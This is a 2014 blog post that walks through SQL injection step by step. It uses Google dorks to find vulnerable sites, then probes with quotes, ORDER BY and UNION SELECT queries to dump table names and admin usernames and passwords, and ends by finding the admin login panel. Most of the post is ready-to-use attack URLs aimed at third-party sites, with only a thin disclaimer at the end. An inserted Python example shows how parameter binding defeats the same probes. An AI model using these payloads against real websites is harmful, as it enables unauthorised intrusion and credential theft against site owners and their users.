Wednesday 19 March 2014



Nothing to do :p hahaha

I will teach you how to hack a vulnerable site in the simplest way :3
using SQL Injection.. <3
You can do this :
ByPassing Logins
Accessing secret data
Modifying contents of website (this is mostly what hackers do)
Shutting down the MySQL server (like a DDOS)

First you need a browser. I recommend Mozilla Firefox.

*Open your browser (Mozilla Firefox), then go here https://addons.mozilla.org/en-US/firefox/addon/hackbar/ (install it)
(requires restarting your browser)

*Then find a Google dork
HOW?
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
(type these into your Google search)

*Just pick one site. Then go to your target site and open the HACK BAR from the Mozilla Firefox add-ons. You will see a new bar under the URL bar; that is where you type and do the hacking.

*After that, let's test whether it is vulnerable or hackable
HOW?
Just add (') at the end

http://www.victimsite.com/index.php?id=2
---------------------------------------------
http://www.victimsite.com/index.php?id=2'

*If an error like this appears
(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) or anything similar, it means the site is vulnerable and you can hack it.

*After that, remove the (') and just add (order by) followed by a number, increasing it like this until you get an error :3

http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (error)

*Next, put a (-) in the id (id=-2) and add
 (union select) up to the last number that gave no error
 (so 3 was the last one with no error, above) like this:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3--

*Then you will see the vulnerable columns there. They show up as numbers.
e.g. number 2

*Now let's find the database, version and user of our target site. The number that showed up in the example was 2, right? So that is where we inject version(), database(), user() (write the results on paper or in a notepad so you don't forget them). (Add id=-2 and 1=2 union select; just copy what is below.)
HOW?

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,version(),3--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,database(),3--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,user(),3--

*If the database version is 5 or above it's OK, but if the version is 4.x, then you have to guess the table names (blind SQL injection attack).

*Then, after knowing the database, user and version, the next step is to find the table names of the database. Replace the 2 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()"
e.g.
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

*Next, the names of the tables will appear there. Mostly ADMIN is the name we need. So if, for example, there is an admin table there, that is the one we choose to get into :3

*Now replace "group_concat(table_name)" with "group_concat(column_name)"
Replace "from information_schema.tables where table_schema=database()--" (the part used in the previous step) with "FROM information_schema.columns WHERE table_name=mysqlchar--"
It should look like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=mysqlchar--

*Then we have to convert the table name to a MySQL CHAR() string
HOW?
In the HACK BAR of Mozilla Firefox you will see SQL; click it, then SQL (the first item), then MySql CHAR().
A pop-up will appear; type the name of the column there, in our example ADMIN. (The code will appear once you click OK :3) Then put it in place of mysqlchar--

Example of the code: CHAR(97, 100, 109, 105, ***)

*After that, copy and paste the code at the end of the URL in place of "mysqlchar" (remember, do not remove the --)
It should look like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, ***)--

*Once you submit that, the names will appear.
Examples are these:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

*Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Then replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, ***)" with "from table_name(ADMIN)"

{If the above query displays the 'column is not found' error, then try another column name from the list.}

example:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,group_concat(admin_id,0x3a,admin_password),3 from admin--

THE ADMIN USERNAME AND ADMIN PASSWORD WILL NOW APPEAR <3 haha. So how do you use them?

LET'S FIND ITS ADMIN PANEL:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/

Once you find it, the login page will appear there. Therefore you can now log in using the ADMIN USERNAME AND ADMIN PASSWORD :3
ENJOY..
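
Why every probe in the walk-through works against string-built SQL and stops working against validated, bound input, as an added example that is not part of the original post. It uses Python's sqlite3 in place of PHP/MySQL so it runs offline; the `articles` table, its row and the function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (2, 'Hello', 'First post');
    """)
    return db

def vulnerable_lookup(db, raw_id):
    # Weak form: the parameter is concatenated into the SQL text, so the
    # database parses client input as part of the statement.
    try:
        sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Returning the driver error to the client confirms the flaw.
        return "SQL error: %s" % exc

def hardened_lookup(db, raw_id):
    # 1. Validate: an article id is 1 to 10 ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []  # the caller renders a generic "not found" page
    # 2. Bind: the value travels as a parameter, never as SQL text.
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# The id values the walk-through sends, copied from the URLs above.
PROBES = ["2", "2'", "2 order by 4", "-2 union select 1,2,3--"]

def compare():
    # Map each probe to (result from weak form, result from hardened form).
    db = make_db()
    return {p: (vulnerable_lookup(db, p), hardened_lookup(db, p))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, strong) in compare().items():
        print("%-26r weak=%r hardened=%r" % (probe, weak, strong))
```

The hardened form returns the same empty result for the quote, the `order by` count and the `union select`, so the page gives no error text or reflected column to work from.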



Warning:
The above post is for educational purposes only. Never attempt to follow the above steps against third-party websites. If you want to learn the SQL injection attack method, you can learn in a safe environment by setting up your own lab.

In this article, I just explained how to attack an SQL injection vulnerable site in a n00b (newbie) way. If you want to become a PenTester, you must know how these attacks work. In my next article, I will explain SQL Injection in depth.


-Credits to ZePh of SYMBIANIZE 2k6 >.<

The effect of having nothing to do hahahaaha